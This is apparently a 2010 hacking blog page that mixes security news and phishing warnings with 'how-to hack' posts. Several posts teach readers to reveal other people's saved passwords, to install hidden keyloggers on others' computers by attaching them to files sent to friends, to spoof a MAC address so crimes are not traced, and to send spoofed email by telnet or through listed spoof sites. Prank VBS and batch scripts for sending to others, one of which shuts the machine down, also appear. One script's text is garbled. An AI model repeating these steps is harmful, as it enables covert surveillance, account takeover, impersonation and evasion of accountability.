Hope 2011 is better!!

Recently security vendor Bit9 released its annual "Dirty Dozen" list. According to statistics obtained from International Institute of Standard and Technology and International Vulnerability Database, it lists top 12 software with most vulnerabilities for 2010. From January to October this year, Google Chrome browser vulnerability has been discovered up to 76, which tops the list.

Besides Google Chrome, Apple's Safari browser and Microsoft Office's vulnerabilities are also getting more exposure, respectively 60 and 57 in the past year, ranking second and third. The software included in the list are frequently used. Here is the specific list:

1. Google Chrome, 76 vulnerabilities;
2. Apple Safari, 60 vulnerabilities;
3. Microsoft Office, 57 vulnerabilities;
4. Adobe Acrobat, 54 vulnerabilities;
5. Mozilla Firefox, 51 vulnerabilities;
6. Sun JDK, 36 vulnerabilities;
7. Adobe Shockwave Player, 35 vulnerabilities;
8. Microsoft IE, 32 vulnerabilities;
9. RealNetworks RealPlayer, 14 vulnerabilities;
10. Apple Webkit, 9 vulnerabilities;
11. Adobe Flash Player, 8 vulnerabilities;

12. Apple Quicktime and Opera browser, 6 vulnerabilities.

Article from: Top 12 Software with Most Vulnerabilities for 2010

Easy access using the new App!

Now you can visit this site more frequently without the need to open a web browser.
We at tech-DA-hack have created an app for our readers. This app is available in the Ovi Store and is called "Tech-da-hack". At present, the app is available only for users of Nokia mobile, but we are determined to create apps for other mobiles as soon as possible. We at tech-da-hack are eagerly waiting to hear from our readers about this app as it would surely motivate us towards creating app for other mobiles too, as soon as possible.
We believe that the app would definitely provide a decrease in your access-time towards this site.
We would like to request our readers to download the app and also post reviews so that we can improve the application.
Even though it is still a basic app which provides all our posts with options to share the posts with your friends via e-mail and/or SMS, we would like to add more functionalities.

Hoping to see a lot of downloads!!

You can find the app at: http://store.ovi.com/content/79876

GPRS hack- Not Illegal !!

 We at tech-DA-hack believe that anything that we do bypassing the usual way, can be termed as hacking. Accessing the Internet from your mobile is also a form of hacking, as we'll access it in a form other than the one that the operators want us to. And the best part is, this is completely legal!!

So we at tech-DA-hack are bringing this post so as to help our readers with the GPRS settings on their mobile phones. We are providing the settings in their general form. If you face any problem, then kindly post a comment and we’ll help you in configuring your mobile easily.

As a matter of fact, even the customer care executives will not be able to help you so easily!!!

We are also providing a PDF file so that you can always keep the settings handy in the form of the pdf file.

The PDF file can be found at this location: http://rapidshare.com/files/436844646/GPRS_Settings.pdf

AIRCEL:

                             APN:               aircelwap

                             PROXY:          Enabled

                             IP:                    172.17.83.69

                             PORT:             8080

 

 

AIRTEL:

                             APN:               airtelgprs.com

 

 

BSNL:

                             APN:               bsnlnet

 

 

IDEA:

                             APN:               internet

 

 

RELIANCE:

                             APN:               rcomwap

                             IP:                    010.239.221.005

                             PORT:             8080

 

UNINOR:

                             APN:               uninor

                             PROXY:          Enabled

                             IP:                    010.058.010.058

                             PORT:             8080

 

  

VODAFONE:

                             APN:               portalnmms

                             PROXY:          Enabled

                             IP:                    010.010.001.100

                             PORT:             9401 or 9201

 

 

VIDEOCON:

                             APN:               vinternet.com

 

--------------------------------------------------------------

Potential WikiLeaks Phishing Scams

We at tech-DA-hack have recieved an informational email from US-Cert regarding the phishing scams related to the Wikileaks website.The important portion of the mail that we received from the US-Cert website is mentioned here:

"In the past, US-CERT has received reports of phishing scams and
malware campaigns related to topics that are of high-interest to the
U.S. Government or news media, such as the WikiLeaks website. Users'
systems have been compromised by receiving and accessing phishing
emails with subject lines that seem relevant to a high-interest
subject and appear to originate from a valid sender. US-CERT reminds
users to remain vigilant for potential malicious cyber activity
seeking to capitalize on interest in WikiLeaks. Users are advised to
exercise caution in handling any email with subject line, attachments,
or hyperlinks related to WikiLeaks, even if it appears to originate
from a trusted source.

Users must take the following
preventative measures to protect themselves from phishing scams and
malware campaigns:

* Do not follow unsolicited web links in email messages.
* Use caution when opening email attachments. Refer to the Using
Caution with Email Attachments Cyber Security Tip for more
information on safely handling email attachments.
* Maintain up-to-date antivirus software. "

Adobe Acrobat/Reader Phishing Scam

Today the Adobe Product Security Incident Response Team (PSIRT) released a bulletin stating the email phishing scam that has been reported by customers for some Adobe products.

This is what their bulletin said:

"With the availability of Adobe Acrobat X solutions this week, a reminder to be cautious when receiving email messages purporting to offer a download of a new version of Adobe Acrobat or Adobe Reader sent by entities claiming to be Adobe.

Many of these emails require recipients to register and/or provide personal information. Please be aware that these emails have not been sent by Adobe or on Adobe’s behalf.

The Adobe Reader, in particular, is free software available for download directly from the Adobe Reader download page on the Adobe website at http://get.adobe.com/reader/; it is not available in any other manner via download, including via email.

Customers receiving one of these potentially malicious emails should delete the email immediately without clicking on any of the links."

We at tech-DA-hack always recommend our readers to stay alert towards any email that may seem suspicious. We also strive to keep you updated with the latest news,vulnerabilities,reports,etc.

Vulnerability:- Adobe Shockwave Player

A critical vulnerability exists in Adobe Shockwave Player 11.5.8.612 and earlier versions on the Windows and Macintosh operating systems.

This vulnerability (CVE-2010-3653) could cause a crash and potentially allow an attacker to take control of the affected system. While details about the vulnerability have been disclosed publicly, Adobe is not aware of any attacks exploiting this vulnerability against Adobe Shockwave Player to date.

Adobe actively shares information about this and other vulnerabilities with partners in the security community to enable them to quickly develop detection and quarantine methods to protect users until a patch is available.

As always, Tech-da-Hack recommends that users follow best security practices by keeping their anti-malware software and definitions up to date.

WiFi Alliance now certifies WiFi Direct products

First demonstrated at CES 2010, Wi-Fi Direct has taken another step to become part of the Wi-Fi usage spectrum.

The Wi-Fi Alliance, the group that tests and certifies Wi-Fi products to make sure they interoperate, announced today that it has begun certifying products capable of making Wi-Fi-based device-to-device connections and designating them Wi-Fi Certified Wi-Fi Direct.

Traditionally, Wi-Fi clients need to connect to a central place, called an access point, before they can connect to one another in their "infrastructure" mode. Other than that, they can also connect in pairs via a mode called "ad-hoc," which is limited both in range and throughput speed.

Wi-Fi Direct, on the other hand, allows Wi-Fi devices to connect to one another without an access point at the same speed and range of the infrastructure mode. They can also establish a connection much faster via Wi-Fi Protected Setup, a method that enables connecting devices by pressing a button. In other words, Wi-Fi Direct allows Wi-Fi products to connect much like Bluetooth devices but at a much faster speed and a much longer range.

With this flexibility, Wi-Fi Direct devices fill an important hole in daily usage: directly connecting devices for applications such as content sharing, synching, printing, and gaming anywhere, without users having to carry along an access point.

According to the Wi-Fi Alliance, another advantage of Wi-Fi Certified Wi-Fi Direct devices is the fact that they can work with traditional Wi-Fi Certified devices, as they act as a mini access point, to which traditional Wi-Fi products can connect.

The Wi-Fi Alliance say that it formed the test suite for the certification program by using the following products, which are also the first that are designated Wi-Fi Certified Wi-Fi Direct:

• Atheros XSPAN dual-band 802.11n PCIe mini card (AR928x)
• Broadcom BCM43224 dual-band 802.11n 2x2 MIMO PCIe half mini card
• Intel Centrino Advanced-N 6200
• Ralink MIMObility 802.11n 2x2 PCIe half mini card
• Realtek RTL8192CE-VA4 HM92C00 PCIe mini card

The group used the Cisco 2106 Wireless LAN Controller and Cisco Aironet 1240 Series Access Points for the certification test suite.

Source: http://news.cnet.com/8301-1035_3-20020539-94.html?part=rss&subj=news&tag=2547-1_3-0-20#ixzz13OTTmF00

Print a message as many times you like!

This fun hack is a VB script which will keep on displaying "You are a fool." and even can make the computer to hang as this will keep on displaying for "n" number of times.

For this VB script we just need to type the following command in the notepad::

Set wshShell = wscript.CreateObject("WScript.Shell")

do

wscript.sleep 100

wshshell.sendkeys "You are a fool."

loop

and save it as "anyname.vbs".

Enjoy The Fun Of Scripting ...

Public computers are now secure for Facebook

Users who access their Facebook account from public computers can now have some peace of mind when logging in. A new feature from Facebook will send you a password on your registered mobile,and then you can use that password to log in. For getting the password, you'll have to text "otp" to 32665 from the mobile registered on Facebook. The benefit of this password is that it will expire after 20 minutes.
So, if you wish to re-login then you'll have to send the text message again.


Another feature that has been enabled is similar to a feature provided by Gmail. It displays details about all the "Active Sessions" that you may have from other computers. This happens if you had selected the "Stay Signed In" box while logging-in.

Facebook is rolling the feature out gradually, and it should be available to everyone in the coming weeks.

PASSWORD REVEALER

Many people have the habit of saving their facebook, orkut , yahoo passwords on their computer. What if we want to hack their id or know their password,We cannot do that by using any kind of key logger or any such tools. So, What do we do?

In such case we have to look for some other alternative .Now , What can that alternative be?

You don't have to worry about that, as we are always present to help you. The solution is that we use some password revealing software/tool to get the encrypted password revealed .There are many tools available on the Internet. One of such tools is snadboy. This tool helps one reveal saved passwords. It is also very easy to use.

How to get it and use it?

Step 1:Just download this tool from the Internet by a simple google search.(or www.snadboy.com)

Step 2:Install it on the system from which you want to get the password revealed .

Step 3:You will find a symbol(as below) just hold it and drag it on to the saved password and the encrypted message will be revealed in the tool window.

MAC SPOOFING

First of all a question arises that what is MAC address?

MAC stands for media access control address. It is the hardware network address for the network interface cards.

Now why do we have spoof it?

We have to spoof it in the cases when you are performing some administrative task or in case you are performing some kind of crime and you don't want to get caught. As MAC is the physical address it remains constant until and unless you manually change it. And if you don't change it and and perform some kind of unauthenticated task police easily catches you with the help of your MAC number.So, it is essential to spoof your MAC address.

How do we know our MAC address?

To know your MAC address simply go to command prompt and type " ipconfig/all " this will show all the network adapters and interface cards present. And the physical address would be your MAC address.

How do we spoof our MAC?

There are two basic ways of doing so::

1. Manually editing it from the registry.

2. Using some third party software to do it.

1. Manually editing it::

Step 1: Click on run and type regedit.

Step 2: go to

HKEY_LOCAL_MACHINE -> SYSTEM -> CurrentControlSet -> Control -> Class ->{4D36E972-E325-11CE-BFC1-08002BE10318}

Step 3: Now under {4D36E972-E325-11CE-BFC1-08002BE10318} you will find different subheadings like "0000","0001" and so on. now manually click on each subheading and on the right hand side many options will be shown check for NetworkAddress.

Step4: Once you find NetworkAddress click on it and enter the new 12 digit mac number without gap and click on ok.

Step 5: Once all this is done now goto the control panel -> Network Connections and disable and enable the network card. This will change your MAC address.

How do we get our MAC address back?

In order to get the old MAC address back simply delete the entry which you had made. This way you can get back your MAC.

The MAC spoofing with the help of third party software will be discussed in another post.

Airtel 3G

Airtel has recently launched a page in its domain which shows the benefits of 3G features that Airtel users might be able to access. It has not yet announced any date for the launch of 3G,but the site shows the features of 3G.

This page seems to be an informational page and will be helpful to those consumers who wish to gain more information about 3G and its benefits.

The addition of this page to airtel.in shows that we are soon going to get 3G service from this telecom operator.

Eagerly waiting.....!

Fun Hack cont...

POP out your friend's CD/DVD Drive. If he/she has more than one, it pops all of them out.
Type :

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Save it as "anyname.VBS" and send it.

Strong password

A Good Password must have 3 properties ::

1.IT SHOULD BE A COMBINATION OF ALPHABETS CHARACTERS(LOWER & UPPER CASES)AND NON ALPHABETIC CHARACTERS(*&^$).
2.SHOULD NOT BE YOUR NAME RELATIVES (GF/BF).
3.IT SHOULD NOT BE TOLD TO ANYONE.

Password hacking

Many a times we want to hack the password of some person 'xyz' and we keep thinking of the ways we can do it. And there may be is a chance that this person uses your laptop / computer at times to check his/ her email/facebook or orkut or any of it. We also want to see the details or the chat history i.e. who did he chat with and what did he chat.

Now how do we do to get these information ? Just go and ask him...

No, he will to tell you all this. Now to know all this secretly and without his/her knowledge we can use certain third party tools named the "KEYLOGGERS" these are the tools which help you can make the logs of the things done on the computer by him or her,the best part of these monitoring tools is that they can be easily be hidden and the user cannot come to know that they are present.And one more thing few of these tools also work on remote systems.

How to look for them :: just go to google and type keyloggers and you find a large range of them. But the few, which are working properly and We personally have worked with are:

1. Ardamax Keylogger: This is a very good and effective tool in the case of key loggers. Easily available on the Internet. This works on remote systems also. But this is a paid version, And we all know how to use torrent .

2. Child safe: This is also equivalent to Ardamax but works only on a personal system. This has a very effective snapshot feature. They are easily available on the Internet.

3. Actual spy: It is just a key logger but very effective and easy to use. This is a freeware available on the Internet.

4.Perfect keylogger: This has an advance feature of taking snapshot at every mouse click. Not a freeware .Available on the Internet.

How to use them ??

step 1: Download any one of them.

step 2: Install it on the system where you want it to log the data from(if remote system attach it to a file and send it to your friend and as soon as he clicks on the file at the background it will get installed) we will make another post about "How to attach a keylogger to a file".

step 3:Look at the instructions and carefully configure the logger as required.

step 4: Be careful because it might log your data also, If installed on your system.

This way you you can log the data ...

Fun Hack

Here are few of the pranks which you can play with your friends. on a remote system and on your own system which will make them feel that the system has got some viruses in it.

THESE COMMANDS HaVE TO BE WRITTEN ON NOTEPAD::

1.Display a little message and shut down his/her computer :

Type :

@echo off

msg * I don't like you

shutdown -c "Error! You are too ******!" -s

Save it as "Anyname.BAT" in All Files and send it.

2. Toggle your friend's Caps Lock button:

Type :

Set wshShell =wscript.CreateObject("WScript.Shell")

do

wscript.sleep 100

wshshell.sendkeys "{CAPSLOCK}"

loop

Save as "Anyname.VBS" and send it.

Fun Hack cont...

2. Open Notepad and slowly type "Hello,friend how are you? I am fine bbye tc":

Type :

WScript.Sleep 180000

WScript.Sleep 10000

Set WshShell = WScript.CreateObject("WScript.Shell")

WshShell.Run "notepad"

WScript.Sleep 100

WshShell.AppActivate "Notepad"

WScript.Sleep 500

WshShell.SendKeys "Hel"

WScript.Sleep 500

WshShell.SendKeys "lo "

WScript.Sleep 500

WshShell.SendKeys ", fri"

WScript.Sleep 500

WshShell.SendKeys "end"

WScript.Sleep 500

WshShell.SendKeys " how"

WScript.Sleep 500

WshShell.SendKeys " are"

WScript.Sleep 500

WshShell.SendKeys "you"

WScript.Sleep 500

WshShell.SendKeys "? "

WScript.Sleep 500

WshShell.SendKeys "I a"

WScript.Sleep 500

WshShell.SendKeys "m f"

WScript.Sleep 500

WshShell.SendKeys "ine"

WSc, hoript.Sleep 500

WshShelw al.SendKeys " bb"

WScript.Sleep 500

WshShell.SendKeys "ye "

WScript.Sleep 500

WshShell.SendKeys " tc"

Save it as "Anything.VBS" and send it.

Email Spoofing

Some times we just want to hack someone's password for the sake of sending some mails to their girlfriends / boyfriends or may be just friends from their IDs. It is not always essential to hack passwords for just sending few mails. you can do it without logging in their accounts.

Many of us must be wondering that how is it possible to send mails without logging in into someone's account.

We'll tell you.
There are two ways of doing this :
1. Via telnet
2. Via online websites

1.TELNET ::
Step 1. Goto command prompt and type

telnet mx1.hotmail.com 25 //(this will connect you to the smtp server or hotmail)

Step 2. type
HELO hotmail.com //(this will confirm your connection)

Step 3. type
MAIL FROM : (senders address)

Step 4. type
RCPT TO: (receivers person)

Step 5. type
DATA

Type your message, finish the message by a full stop (.) on a new line and press enter and here you have just sent your first spoofed mail.



2. Via Online Web-site::
This is a really easy method of spoofing a mail.
Step1: Google for a site which can spoof a mail for you.

Here are few for your ease:
-->http://mailz.funmaza.co.uk/
-->http://www.anonymailer.net/
-->http://www.sendfakemail.net/fakemail/

Step 2: This will open few pages which will ask for the details of mail. Just enter the details as per requirement and send

Step 3. Take a sip of coffee!! and your mail is sent. And you just have spoofed a mail.

--------------------------------------------------------------------------------------------------------------------------------------------------------